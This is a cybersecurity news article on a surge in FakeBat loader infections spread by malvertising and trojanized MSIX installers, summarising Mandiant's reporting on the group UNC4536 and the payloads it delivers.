New Surge in Malware Infections Linked to FakeBat Loader
Cybersecurity experts have reported a notable increase in malware infections attributable to malvertising campaigns that deploy a loader known as FakeBat. This malicious software targets individuals seeking popular business applications, a strategy that appears to be opportunistically designed to ensnare unsuspecting users. According to a technical report from the Mandiant Managed Defense team, the complexity of the attack lies in the use of a trojanized MSIX installer, which runs a PowerShell script tasked with downloading additional malicious payloads.
FakeBat, also referred to as EugenLoader or PaykLoader, is tied to a threat group identified as Eugenfest. The threat intelligence unit at Google is tracking this malware variant as NUMOZYLOD and attributes its operation to a sophisticated malware-as-a-service enterprise known as UNC4536.
The distribution mechanism of FakeBat relies heavily on drive-by downloads, funneling users searching for legitimate software to counterfeit websites hosting these compromised MSI installers. Infection vectors carried by FakeBat include a range of known malware families, such as IcedID, RedLine Stealer, Lumma Stealer, SectopRAT, and Carbanak, the latter associated with the financially motivated cybercriminal organization FIN7.
Mandiant’s findings further reveal that UNC4536’s methodology leverages malvertising techniques to disseminate trojanized installers masquerading as trusted applications, including notable names like Brave, KeePass, Notion, Steam, and Zoom. The sites hosting these deceptive installers are designed to closely resemble legitimate software distribution pages, effectively tricking users into downloading harmful content.
A highlight of this attack is the utilization of MSIX installers that are capable of executing scripts prior to the main application launch, employing a configuration known as startScript. This sophisticated approach allows the malware to gain holding power and facilitates its delivery of secondary payloads to the attackers’ business partners.
Beyond simply distributing malware, FakeBat serves as a pivotal tool in the arsenal of UNC4536, which primarily operates as a malware distributor, ensuring its partners, including the FIN7 group, have access to various next-stage payloads poised for exploitation.
Research indicates that NUMOZYLOD functions by collecting critical system information, such as the operating system version, domain affiliation, and installed antivirus software. In certain variants, the malware collects the host’s public IPv4 and IPv6 addresses, transmitting this data back to its command and control infrastructure. The malware also maintains persistence by creating shortcuts in the system’s Startup folder.
This heightened threat landscape follows closely on the heels of an earlier report from Mandiant detailing another malware downloader known as EMPTYSPACE. This previous malware variant has been linked to financially motivated threat actors engaging in data exfiltration and cryptojacking targeting specific sectors within Italy.
Business owners must remain alert to the implications of these findings and consider strengthening their cybersecurity measures. Potential tactics employed in these attack methods align with various techniques cataloged in the MITRE ATT&CK framework, including initial access through compromised legitimate software, persistence through the creation of startup entries, and potential privilege escalation via delivered malware payloads.
As the cybersecurity climate continues to evolve, vigilance, education, and preparedness are crucial for protecting sensitive information against increasingly sophisticated threats.
Source Link : https://thehackernews.com/2024/08/cybercriminals-exploit-popular-software.html
